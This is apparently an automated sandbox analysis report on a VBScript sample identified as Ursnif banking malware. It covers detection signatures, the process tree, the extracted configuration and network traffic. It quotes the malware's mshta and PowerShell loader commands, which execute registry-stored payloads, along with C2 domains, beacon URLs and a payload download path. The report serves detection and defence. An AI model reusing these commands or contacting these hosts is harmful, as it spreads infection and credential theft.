Loading ...

Play interactive tourEdit tour

Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Sample Name:2Q4tLHa5wbO1.vbs
Analysis ID:321602
MD5:afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
WScript reads language and country specific registry keys (likely country aware script)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4180 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 7092 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 7008 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4604 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3484 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 4700 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • control.exe (PID: 6328 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 2216 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • nslookup.exe (PID: 6632 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
    • rundll32.exe (PID: 6828 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 22 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', ProcessId: 3484
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7008, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 4604
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', ProcessId: 3484
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6328, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6828

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\marginal.roqAvira: detection malicious, Label: TR/Crypt.XDR.Gen
            Found malware configurationShow sources
            Source: explorer.exe.3424.30.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\marginal.roqReversingLabs: Detection: 68%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\marginal.roqJoe Sandbox ML: detected
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Uses nslookup.exe to query domainsShow sources
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmpString found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: unknownHTTP traffic detected: POST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Nov 2020 11:19:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmpString found in binary or memory: http://api10.lapto
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
